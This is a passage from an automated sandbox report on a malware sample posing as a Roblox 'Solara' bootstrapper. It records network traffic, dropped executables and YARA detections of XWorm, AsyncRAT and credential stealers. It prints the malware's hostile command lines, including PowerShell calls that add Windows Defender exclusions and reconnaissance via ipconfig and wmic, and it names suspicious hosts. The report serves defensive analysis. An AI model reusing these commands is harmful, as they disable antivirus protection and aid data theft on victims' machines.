                                                                                                                                                      Nov 14, 2024 20:14:10.126817942 CET1.1.1.1192.168.2.70x8536No error (0)www.nodejs.org104.20.22.46A (IP address)IN (0x0001)false
                                                                                                                                                      Nov 14, 2024 20:14:10.126817942 CET1.1.1.1192.168.2.70x8536No error (0)www.nodejs.org104.20.23.46A (IP address)IN (0x0001)false
                                                                                                                                                      Nov 14, 2024 20:15:02.191560984 CET1.1.1.1192.168.2.70xbea6No error (0)23.ip.gl.ply.gg147.185.221.23A (IP address)IN (0x0001)false

                                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                                      • getsolara.dev
                                                                                                                                                      • clientsettings.roblox.com
                                                                                                                                                      • www.nodejs.org
                                                                                                                                                      • ip-api.com

                                                                                                                                                      HTTP Packets

                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      0192.168.2.749702208.95.112.1802404C:\Users\user\AppData\Local\Temp\Injector.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      Nov 14, 2024 20:14:04.506669044 CET80OUTGET /line/?fields=hosting HTTP/1.1
                                                                                                                                                      Host: ip-api.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Nov 14, 2024 20:14:05.101888895 CET174INHTTP/1.1 200 OK
                                                                                                                                                      Date: Thu, 14 Nov 2024 19:14:04 GMT
                                                                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                                                                      Content-Length: 5
                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                      X-Ttl: 60
                                                                                                                                                      X-Rl: 44
                                                                                                                                                      Data Raw: 74 72 75 65 0a
                                                                                                                                                      Data Ascii: true


                                                                                                                                                      HTTPS Proxied Packets

                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      0192.168.2.749700104.21.93.274434064C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-11-14 19:14:03 UTC81OUTGET /asset/discord.json HTTP/1.1
                                                                                                                                                      Host: getsolara.dev
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      2024-11-14 19:14:03 UTC1018INHTTP/1.1 200 OK
                                                                                                                                                      Date: Thu, 14 Nov 2024 19:14:03 GMT
                                                                                                                                                      Content-Type: application/json
                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                      Connection: close
                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                      Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                      ETag: W/"7d966f73b6ce74a610dddaf0d0951ed8"
                                                                                                                                                      referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VVPj5fKYxfSp%2BZa1NquxPpIV3x5Ozh%2BzH3LNS1RaUxu2aqQA4li3mHqnqr2xDjPQQFLvQ9qvLJJJWjYvXgBjR8qNfaGo4HaQ4%2FirXZbqvy8DniCuJuHqvjmIqk2anK2A"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                      Strict-Transport-Security: max-age=0
                                                                                                                                                      Server: cloudflare
                                                                                                                                                      CF-RAY: 8e2952855a9f15be-SJC
                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=39145&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2812&recv_bytes=695&delivery_rate=73945&cwnd=32&unsent_bytes=0&cid=2d95af225561dcd8&ts=1138&x=0"
                                                                                                                                                      2024-11-14 19:14:03 UTC109INData Raw: 36 37 0d 0a 7b 0a 20 20 20 20 22 61 72 67 73 22 20 3a 20 7b 0a 20 20 20 20 20 20 20 22 63 6f 64 65 22 20 3a 20 22 38 50 67 73 70 52 59 41 51 75 22 0a 20 20 20 20 7d 2c 0a 20 20 20 20 22 63 6d 64 22 20 3a 20 22 49 4e 56 49 54 45 5f 42 52 4f 57 53 45 52 22 2c 0a 20 20 20 20 22 6e 6f 6e 63 65 22 20 3a 20 22 2e 22 0a 20 7d 0d 0a
                                                                                                                                                      Data Ascii: 67{ "args" : { "code" : "8PgspRYAQu" }, "cmd" : "INVITE_BROWSER", "nonce" : "." }
                                                                                                                                                      2024-11-14 19:14:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                      Data Ascii: 0


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      1192.168.2.749703104.21.93.274434064C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-11-14 19:14:06 UTC56OUTGET /api/endpoint.json HTTP/1.1
                                                                                                                                                      Host: getsolara.dev
                                                                                                                                                      2024-11-14 19:14:06 UTC1015INHTTP/1.1 200 OK
                                                                                                                                                      Date: Thu, 14 Nov 2024 19:14:06 GMT
                                                                                                                                                      Content-Type: application/json
                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                      Connection: close
                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                      Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                      ETag: W/"f6b52a565df2f13c59cdfa7bdef89298"
                                                                                                                                                      referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Bq0wmpm0fsmW8YhHyXFigk3QThwGIUIK8OhyWjGx4YxgVcCF5bVe%2BSvRqZa3qWw8WISASDHeDaZERsWbcVc2mSp54GkNhhWuguOtVIsCFz9dBkMk3OFrOFFGI3GCgO9T"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                      Strict-Transport-Security: max-age=0
                                                                                                                                                      Server: cloudflare
                                                                                                                                                      CF-RAY: 8e2952983ddf2510-SJC
                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=44833&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2812&recv_bytes=694&delivery_rate=64567&cwnd=32&unsent_bytes=0&cid=6871c0110a50a616&ts=259&x=0"
                                                                                                                                                      2024-11-14 19:14:06 UTC354INData Raw: 32 31 63 0d 0a 7b 0a 20 20 20 20 22 42 6f 6f 74 73 74 72 61 70 70 65 72 56 65 72 73 69 6f 6e 22 3a 20 22 31 2e 32 33 22 2c 0a 20 20 20 20 22 53 75 70 70 6f 72 74 65 64 43 6c 69 65 6e 74 22 3a 20 22 76 65 72 73 69 6f 6e 2d 33 32 66 33 36 61 63 39 34 34 62 33 34 39 31 33 22 2c 0a 20 20 20 20 22 53 6f 66 74 77 61 72 65 56 65 72 73 69 6f 6e 22 3a 20 22 33 2e 31 32 38 22 2c 0a 20 20 20 20 22 42 6f 6f 74 73 74 72 61 70 70 65 72 55 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 34 64 33 38 61 31 65 63 2e 73 6f 6c 61 72 61 77 65 62 2d 61 6c 6a 2e 70 61 67 65 73 2e 64 65 76 2f 64 6f 77 6e 6c 6f 61 64 2f 73 74 61 74 69 63 2f 66 69 6c 65 73 2f 42 6f 6f 74 73 74 72 61 70 70 65 72 2e 65 78 65 22 2c 0a 20 20 20 20 22 53 6f 66 74 77 61 72 65 55 72 6c 22 3a 22 68 74 74 70 73
                                                                                                                                                      Data Ascii: 21c{ "BootstrapperVersion": "1.23", "SupportedClient": "version-32f36ac944b34913", "SoftwareVersion": "3.128", "BootstrapperUrl": "https://4d38a1ec.solaraweb-alj.pages.dev/download/static/files/Bootstrapper.exe", "SoftwareUrl":"https
                                                                                                                                                      2024-11-14 19:14:06 UTC193INData Raw: 2f 2f 63 6c 69 65 6e 74 73 65 74 74 69 6e 67 73 2e 72 6f 62 6c 6f 78 2e 63 6f 6d 2f 76 32 2f 63 6c 69 65 6e 74 2d 76 65 72 73 69 6f 6e 2f 57 69 6e 64 6f 77 73 50 6c 61 79 65 72 2f 63 68 61 6e 6e 65 6c 2f 6c 69 76 65 22 2c 0a 20 20 20 20 22 43 6c 69 65 6e 74 48 61 73 68 22 3a 22 34 66 33 61 34 65 65 34 66 65 30 63 37 63 37 36 61 30 65 36 39 34 30 36 36 61 35 64 33 62 33 61 36 37 37 66 31 32 35 39 65 35 62 33 33 30 35 32 66 65 66 35 36 37 37 39 66 36 36 34 35 32 34 32 22 2c 0a 20 20 20 20 22 43 68 61 6e 67 65 6c 6f 67 22 3a 22 5b 2b 5d 20 75 70 64 61 74 65 64 22 0a 7d 0d 0a
                                                                                                                                                      Data Ascii: //clientsettings.roblox.com/v2/client-version/WindowsPlayer/channel/live", "ClientHash":"4f3a4ee4fe0c7c76a0e694066a5d3b3a677f1259e5b33052fef56779f6645242", "Changelog":"[+] updated"}
                                                                                                                                                      2024-11-14 19:14:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                      Data Ascii: 0


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      2192.168.2.749704128.116.123.34434064C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-11-14 19:14:08 UTC119OUTGET /v2/client-version/WindowsPlayer/channel/live HTTP/1.1
                                                                                                                                                      Host: clientsettings.roblox.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      2024-11-14 19:14:08 UTC576INHTTP/1.1 200 OK
                                                                                                                                                      content-length: 119
                                                                                                                                                      content-type: application/json; charset=utf-8
                                                                                                                                                      date: Thu, 14 Nov 2024 19:14:07 GMT
                                                                                                                                                      server: Kestrel
                                                                                                                                                      cache-control: no-cache
                                                                                                                                                      strict-transport-security: max-age=3600
                                                                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                                                                      roblox-machine-id: 579c3809-faaa-6386-93ce-541575ccef5a
                                                                                                                                                      x-roblox-region: us-central_rbx
                                                                                                                                                      x-roblox-edge: fra2
                                                                                                                                                      report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://ncs.roblox.com/upload"}]}
                                                                                                                                                      nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1}
                                                                                                                                                      connection: close
                                                                                                                                                      2024-11-14 19:14:08 UTC119INData Raw: 7b 22 76 65 72 73 69 6f 6e 22 3a 22 30 2e 36 35 31 2e 30 2e 36 35 31 30 38 33 33 22 2c 22 63 6c 69 65 6e 74 56 65 72 73 69 6f 6e 55 70 6c 6f 61 64 22 3a 22 76 65 72 73 69 6f 6e 2d 33 32 66 33 36 61 63 39 34 34 62 33 34 39 31 33 22 2c 22 62 6f 6f 74 73 74 72 61 70 70 65 72 56 65 72 73 69 6f 6e 22 3a 22 31 2c 20 36 2c 20 30 2c 20 36 35 31 30 38 33 33 22 7d
                                                                                                                                                      Data Ascii: {"version":"0.651.0.6510833","clientVersionUpload":"version-32f36ac944b34913","bootstrapperVersion":"1, 6, 0, 6510833"}


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      3192.168.2.749706104.20.22.464434064C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-11-14 19:14:10 UTC99OUTGET /dist/v18.16.0/node-v18.16.0-x64.msi HTTP/1.1
                                                                                                                                                      Host: www.nodejs.org
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      2024-11-14 19:14:11 UTC497INHTTP/1.1 307 Temporary Redirect
                                                                                                                                                      Date: Thu, 14 Nov 2024 19:14:11 GMT
                                                                                                                                                      Content-Type: text/plain
                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                      Connection: close
                                                                                                                                                      Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                      location: https://nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msi
                                                                                                                                                      strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                      x-vercel-id: cle1::p9jb9-1731611651319-944db52af73d
                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Server: cloudflare
                                                                                                                                                      CF-RAY: 8e2952b2ca6b0bef-DFW
                                                                                                                                                      2024-11-14 19:14:11 UTC20INData Raw: 66 0d 0a 52 65 64 69 72 65 63 74 69 6e 67 2e 2e 2e 0a 0d 0a
                                                                                                                                                      Data Ascii: fRedirecting...
                                                                                                                                                      2024-11-14 19:14:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                      Data Ascii: 0


                                                                                                                                                      Statistics

                                                                                                                                                      CPU Usage

                                                                                                                                                      Click to jump to process

                                                                                                                                                      Memory Usage

                                                                                                                                                      Click to jump to process

                                                                                                                                                      High Level Behavior Distribution

                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                      Behavior

                                                                                                                                                      Click to jump to process

                                                                                                                                                      System Behavior

                                                                                                                                                      General

                                                                                                                                                      Target ID:0
                                                                                                                                                      Start time:14:13:57
                                                                                                                                                      Start date:14/11/2024
                                                                                                                                                      Path:C:\Users\user\Desktop\8Hd0ZExgJz.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:"C:\Users\user\Desktop\8Hd0ZExgJz.exe"
                                                                                                                                                      Imagebase:0x370000
                                                                                                                                                      File size:819'200 bytes
                                                                                                                                                      MD5 hash:7198FA10A50EA9AAF6AE5C2A05AF2104
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Yara matches:
                                                                                                                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.1259484875.00000000026B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.1259484875.00000000026B1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                      Reputation:low
                                                                                                                                                      Has exited:true

                                                                                                                                                      General

                                                                                                                                                      Target ID:2
                                                                                                                                                      Start time:14:14:00
                                                                                                                                                      Start date:14/11/2024
                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\Injector.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:"C:\Users\user~1\AppData\Local\Temp\Injector.exe"
                                                                                                                                                      Imagebase:0x242bb8d0000
                                                                                                                                                      File size:235'008 bytes
                                                                                                                                                      MD5 hash:3882CFE50E35985982E9EF0C01B99C47
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Yara matches:
                                                                                                                                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000000.1256332897.00000242BB8D2000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_UmbralStealer, Description: Yara detected Umbral Stealer, Source: 00000002.00000000.1256332897.00000242BB8D2000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\Users\user\AppData\Local\Temp\Injector.exe, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_UmbralStealer, Description: Yara detected Umbral Stealer, Source: C:\Users\user\AppData\Local\Temp\Injector.exe, Author: Joe Security
                                                                                                                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attemping to enumerate video devices using WMI, Source: C:\Users\user\AppData\Local\Temp\Injector.exe, Author: ditekSHen
                                                                                                                                                      Antivirus matches:
                                                                                                                                                      • Detection: 100%, Avira
                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                      Reputation:low
                                                                                                                                                      Has exited:true

                                                                                                                                                      General

                                                                                                                                                      Target ID:3
                                                                                                                                                      Start time:14:14:00
                                                                                                                                                      Start date:14/11/2024
                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\Windows Security Host.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:"C:\Users\user~1\AppData\Local\Temp\Windows Security Host.exe"
                                                                                                                                                      Imagebase:0x450000
                                                                                                                                                      File size:81'408 bytes
                                                                                                                                                      MD5 hash:C7BA63CE2ED6D0AAB93AD839E0EDDD68
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Yara matches:
                                                                                                                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000000.1257101643.0000000000452000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000003.00000000.1257101643.0000000000452000.00000002.00000001.01000000.00000007.sdmp, Author: ditekSHen
                                                                                                                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exe, Author: Joe Security
                                                                                                                                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exe, Author: ditekSHen
                                                                                                                                                      Antivirus matches:
                                                                                                                                                      • Detection: 100%, Avira
                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                      Reputation:low
                                                                                                                                                      Has exited:false

                                                                                                                                                      General

                                                                                                                                                      Target ID:4
                                                                                                                                                      Start time:14:14:00
                                                                                                                                                      Start date:14/11/2024
                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:"C:\Users\user~1\AppData\Local\Temp\BootstrapperV1.23.exe"
                                                                                                                                                      Imagebase:0x1ef94d50000
                                                                                                                                                      File size:819'200 bytes
                                                                                                                                                      MD5 hash:02C70D9D6696950C198DB93B7F6A835E
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Antivirus matches:
                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                      • Detection: 29%, ReversingLabs
                                                                                                                                                      Reputation:low
                                                                                                                                                      Has exited:true

                                                                                                                                                      General

                                                                                                                                                      Target ID:5
                                                                                                                                                      Start time:14:14:00
                                                                                                                                                      Start date:14/11/2024
                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                      Imagebase:0x7ff75da10000
                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:true

                                                                                                                                                      General

                                                                                                                                                      Target ID:6
                                                                                                                                                      Start time:14:14:00
                                                                                                                                                      Start date:14/11/2024
                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:"cmd" /c ipconfig /all
                                                                                                                                                      Imagebase:0x7ff67e710000
                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:true

                                                                                                                                                      General

                                                                                                                                                      Target ID:7
                                                                                                                                                      Start time:14:14:00
                                                                                                                                                      Start date:14/11/2024
                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                      Imagebase:0x7ff75da10000
                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:true

                                                                                                                                                      General

                                                                                                                                                      Target ID:8
                                                                                                                                                      Start time:14:14:00
                                                                                                                                                      Start date:14/11/2024
                                                                                                                                                      Path:C:\Windows\System32\ipconfig.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:ipconfig /all
                                                                                                                                                      Imagebase:0x7ff6bd9a0000
                                                                                                                                                      File size:35'840 bytes
                                                                                                                                                      MD5 hash:62F170FB07FDBB79CEB7147101406EB8
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:moderate
                                                                                                                                                      Has exited:true

                                                                                                                                                      General

                                                                                                                                                      Target ID:14
                                                                                                                                                      Start time:14:14:02
                                                                                                                                                      Start date:14/11/2024
                                                                                                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:"wmic.exe" csproduct get uuid
                                                                                                                                                      Imagebase:0x7ff61b130000
                                                                                                                                                      File size:576'000 bytes
                                                                                                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:true

                                                                                                                                                      General

                                                                                                                                                      Target ID:15
                                                                                                                                                      Start time:14:14:02
                                                                                                                                                      Start date:14/11/2024
                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                      Imagebase:0x7ff7b4ee0000
                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:true

                                                                                                                                                      General

                                                                                                                                                      Target ID:16
                                                                                                                                                      Start time:14:14:03
                                                                                                                                                      Start date:14/11/2024
                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Windows Security Host.exe'
                                                                                                                                                      Imagebase:0x7ff741d30000
                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:true

                                                                                                                                                      General

                                                                                                                                                      Target ID:17
                                                                                                                                                      Start time:14:14:03
                                                                                                                                                      Start date:14/11/2024
                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                      Imagebase:0x7ff75da10000
                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:true

                                                                                                                                                      General

                                                                                                                                                      Target ID:23
                                                                                                                                                      Start time:14:14:10
                                                                                                                                                      Start date:14/11/2024
                                                                                                                                                      Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:C:\Windows\system32\WerFault.exe -u -p 4064 -s 2188
                                                                                                                                                      Imagebase:0x7ff6763b0000
                                                                                                                                                      File size:570'736 bytes
                                                                                                                                                      MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:true

                                                                                                                                                      General

                                                                                                                                                      Target ID:24
                                                                                                                                                      Start time:14:14:10
                                                                                                                                                      Start date:14/11/2024
                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Security Host.exe'
                                                                                                                                                      Imagebase:0x7ff741d30000
                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Has exited:true

                                                                                                                                                      General

                                                                                                                                                      Target ID:25
                                                                                                                                                      Start time:14:14:10
                                                                                                                                                      Start date:14/11/2024
                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                      Imagebase:0x7ff75da10000
                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Has exited:true

                                                                                                                                                      General

                                                                                                                                                      Target ID:28
                                                                                                                                                      Start time:15:19:27
                                                                                                                                                      Start date:14/11/2024
                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Windows Security Host.exe'
                                                                                                                                                      Imagebase:0x7ff741d30000
                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Has exited:true

                                                                                                                                                      General

                                                                                                                                                      Target ID:29
                                                                                                                                                      Start time:15:19:27
                                                                                                                                                      Start date:14/11/2024
                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                      Imagebase:0x7ff75da10000
                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Has exited:true

                                                                                                                                                      General

                                                                                                                                                      Target ID:30
                                                                                                                                                      Start time:15:19:43
                                                                                                                                                      Start date:14/11/2024
                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Security Host.exe'
                                                                                                                                                      Imagebase:0x7ff741d30000
                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Has exited:true

                                                                                                                                                      General

                                                                                                                                                      Target ID:31
                                                                                                                                                      Start time:15:19:43
                                                                                                                                                      Start date:14/11/2024
                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                      Imagebase:0x7ff75da10000
                                                                                                                                                      File size:862'208 bytes
